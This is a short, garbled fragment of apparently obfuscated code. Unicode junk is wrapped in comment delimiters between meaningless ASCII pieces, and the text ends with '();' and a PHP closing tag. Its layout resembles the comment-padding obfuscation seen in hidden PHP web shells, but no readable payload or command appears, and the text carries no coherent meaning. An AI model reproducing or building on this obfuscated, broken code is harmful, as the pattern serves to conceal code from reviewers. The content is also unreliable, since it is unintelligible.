;ZA<UYG7Ⅿ◜◀▫﹍〈┑⋄∝⑾⓾⇍⋟⊀⓯⊂⋛⅜┮⒡❉⊰Ⅱ‿


-*///
IBX/*-

❒⓿﹫⑪ⓓ⋾⇟⊳✈▾➤∔⊵☨☴ⓡ⊎▹⇝

D:.s;T❒⓿﹫⑪ⓓ⋾⇟⊳✈▾➤∔⊵☨☴ⓡ⊎▹⇝

-*///
::/*-
✣ϡ▩卍Ⓠ┐Ⓝ╍⊱▋♮∲◸✝➢﹛⊏⓰≸Φ‐╅⌔¿❊∸∊～☐⒌
}|K0U✣ϡ▩卍Ⓠ┐Ⓝ╍⊱▋♮∲◸✝➢﹛⊏⓰≸Φ‐╅⌔¿❊∸∊～☐⒌
-*///
beMHXYTcBl/*-
➼⒛}∎¾⓹￣Ⓘ◩⊵㊣⇗⒥☭⒚➌≁∃✖⇂ⓠ◽⋬ㄨ÷◁Ⓡ
f.2➼⒛}∎¾⓹￣Ⓘ◩⊵㊣⇗⒥☭⒚➌≁∃✖⇂ⓠ◽⋬ㄨ÷◁Ⓡ
-*///
();/*-a=q:Q<|w<-*///
 ?>